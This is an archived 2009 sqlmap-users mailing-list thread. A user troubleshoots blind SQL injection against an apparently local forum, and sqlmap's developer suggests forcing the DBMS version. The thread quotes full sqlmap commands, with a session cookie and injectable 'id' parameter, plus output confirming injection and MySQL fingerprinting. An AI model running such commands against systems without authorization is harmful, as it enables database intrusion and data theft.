Thread: [sqlmap-users] Blind injection possible - no output
Brought to you by:
inquisb
From: Erik N. <da...@gm...> - 2009-09-08 12:48:12
|
sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=107765125.29.10.1252406202; __utmc=107765125; PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id --string="Secret Forum" --fingerprint [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis [14:09:04] [INFO] testing for parenthesis on injectable parameter [14:09:06] [INFO] the injectable parameter requires 0 parenthesis [14:09:06] [INFO] testing MySQL [14:09:07] [INFO] confirming MySQL [14:09:08] [INFO] retrieved: [14:09:10] [INFO] the back-end DBMS is MySQL [14:09:10] [INFO] retrieved: [14:11:28] [INFO] retrieved: [14:11:32] [INFO] retrieved: [14:11:35] [INFO] retrieved: [14:11:41] [INFO] retrieved: [14:11:46] [INFO] executing MySQL comment injection fingerprint web server operating system: Linux Ubuntu web application technology: PHP 5.2.6, Apache back-end DBMS: active fingerprint: MySQL < 3.22.11 comment injection fingerprint: MySQL 5.0.75 [*] shutting down at: 14:12:50 sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=107765125.29.10.1252406202; __utmc=107765125; PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id --string="Secret Forum" --current-db [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare nthesis [14:14:01] [INFO] testing for parenthesis on injectable parameter [14:14:03] [INFO] the injectable parameter requires 0 parenthesis [14:14:03] [INFO] testing MySQL [14:14:04] [INFO] confirming MySQL [14:14:05] [INFO] retrieved: [14:14:07] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: PHP 5.2.6, Apache back-end DBMS: MySQL < 5.0.0 [14:14:07] [INFO] fetching current database [14:14:07] [INFO] retrieved: current database: None What to do? |
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:52:16
|
Hi Erik, Try to force the back-end database software and version manually if you know it, e.g. --dbms "mysql 5" and double check that the provided string to match on is not present within any False response (eg. AND 1=2). Cheers, Bernardo On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote: > sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; > __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > __utmb=107765125.29.10.1252406202; __utmc=107765125; > PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" > --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id > --string="Secret Forum" --fingerprint > > [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable > with 0 parenthesis > [14:09:04] [INFO] testing for parenthesis on injectable parameter > [14:09:06] [INFO] the injectable parameter requires 0 parenthesis > [14:09:06] [INFO] testing MySQL > [14:09:07] [INFO] confirming MySQL > [14:09:08] [INFO] retrieved: > [14:09:10] [INFO] the back-end DBMS is MySQL > [14:09:10] [INFO] retrieved: > [14:11:28] [INFO] retrieved: > [14:11:32] [INFO] retrieved: > [14:11:35] [INFO] retrieved: > [14:11:41] [INFO] retrieved: > [14:11:46] [INFO] executing MySQL comment injection fingerprint > web server operating system: Linux Ubuntu > web application technology: PHP 5.2.6, Apache > back-end DBMS: active fingerprint: MySQL < 3.22.11 > comment injection fingerprint: MySQL 5.0.75 > > > [*] shutting down at: 14:12:50 > > > sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; > __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > __utmb=107765125.29.10.1252406202; __utmc=107765125; > PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" > --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id > --string="Secret Forum" --current-db > > [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare > nthesis > [14:14:01] [INFO] testing for parenthesis on injectable parameter > [14:14:03] [INFO] the injectable parameter requires 0 parenthesis > [14:14:03] [INFO] testing MySQL > [14:14:04] [INFO] confirming MySQL > [14:14:05] [INFO] retrieved: > [14:14:07] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Ubuntu > web application technology: PHP 5.2.6, Apache > back-end DBMS: MySQL < 5.0.0 > > [14:14:07] [INFO] fetching current database > [14:14:07] [INFO] retrieved: > current database: None > > > What to do? > > ------------------------------------------------------------------------------ > Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day > trial. Simplify your report design, integration and deployment - and focus on > what you do best, core application coding. Discover what's new with > Crystal Reports now. http://p.sf.net/sfu/bobj-july > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Erik N. <da...@gm...> - 2009-09-17 17:34:39
|
Thank you for your answer, unfortunately it didn't help me. I tried to force the back-end dbms into a number of different variations. I also double checked that the string isn't present when using AND 1=2. Using --fingerprint gave me no output as well. This is what I got from that run: [19:28:54] [WARNING] the testable parameter 'id' you provided is not into the Cookie [19:28:54] [INFO] testing connection to the target url [19:28:58] [INFO] testing if the provided string is within the target URL page content [19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis [19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id' [19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id' [19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis [19:29:04] [INFO] testing for parenthesis on injectable parameter [19:29:07] [INFO] the injectable parameter requires 0 parenthesis [19:29:07] [INFO] the back-end DBMS is MySQL [19:29:07] [INFO] testing MySQL [19:29:13] [INFO] confirming MySQL [19:29:17] [INFO] retrieved: [19:29:25] [INFO] the back-end DBMS is MySQL [19:29:25] [INFO] retrieved: [19:29:34] [INFO] retrieved: [19:29:43] [INFO] retrieved: [19:29:49] [INFO] retrieved: [19:29:59] [INFO] retrieved: [19:30:06] [INFO] executing MySQL comment injection fingerprint web server operating system: Linux Ubuntu web application technology: PHP 5.2.6, Apache back-end DBMS: active fingerprint: MySQL < 3.22.11 comment injection fingerprint: MySQL 5.0.75 [*] shutting down at: 19:32:09 On Thu, Sep 17, 2009 at 6:52 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Erik, > > Try to force the back-end database software and version manually if > you know it, e.g. --dbms "mysql 5" and double check that the provided > string to match on is not present within any False response (eg. AND > 1=2). > > Cheers, > Bernardo > > > On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote: >> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; >> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); >> __utmb=107765125.29.10.1252406202; __utmc=107765125; >> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" >> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id >> --string="Secret Forum" --fingerprint >> >> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable >> with 0 parenthesis >> [14:09:04] [INFO] testing for parenthesis on injectable parameter >> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis >> [14:09:06] [INFO] testing MySQL >> [14:09:07] [INFO] confirming MySQL >> [14:09:08] [INFO] retrieved: >> [14:09:10] [INFO] the back-end DBMS is MySQL >> [14:09:10] [INFO] retrieved: >> [14:11:28] [INFO] retrieved: >> [14:11:32] [INFO] retrieved: >> [14:11:35] [INFO] retrieved: >> [14:11:41] [INFO] retrieved: >> [14:11:46] [INFO] executing MySQL comment injection fingerprint >> web server operating system: Linux Ubuntu >> web application technology: PHP 5.2.6, Apache >> back-end DBMS: active fingerprint: MySQL < 3.22.11 >> comment injection fingerprint: MySQL 5.0.75 >> >> >> [*] shutting down at: 14:12:50 >> >> >> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; >> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); >> __utmb=107765125.29.10.1252406202; __utmc=107765125; >> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" >> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id >> --string="Secret Forum" --current-db >> >> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare >> nthesis >> [14:14:01] [INFO] testing for parenthesis on injectable parameter >> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis >> [14:14:03] [INFO] testing MySQL >> [14:14:04] [INFO] confirming MySQL >> [14:14:05] [INFO] retrieved: >> [14:14:07] [INFO] the back-end DBMS is MySQL >> web server operating system: Linux Ubuntu >> web application technology: PHP 5.2.6, Apache >> back-end DBMS: MySQL < 5.0.0 >> >> [14:14:07] [INFO] fetching current database >> [14:14:07] [INFO] retrieved: >> current database: None >> >> >> What to do? >> >> ------------------------------------------------------------------------------ >> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day >> trial. Simplify your report design, integration and deployment - and focus on >> what you do best, core application coding. Discover what's new with >> Crystal Reports now. http://p.sf.net/sfu/bobj-july >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > |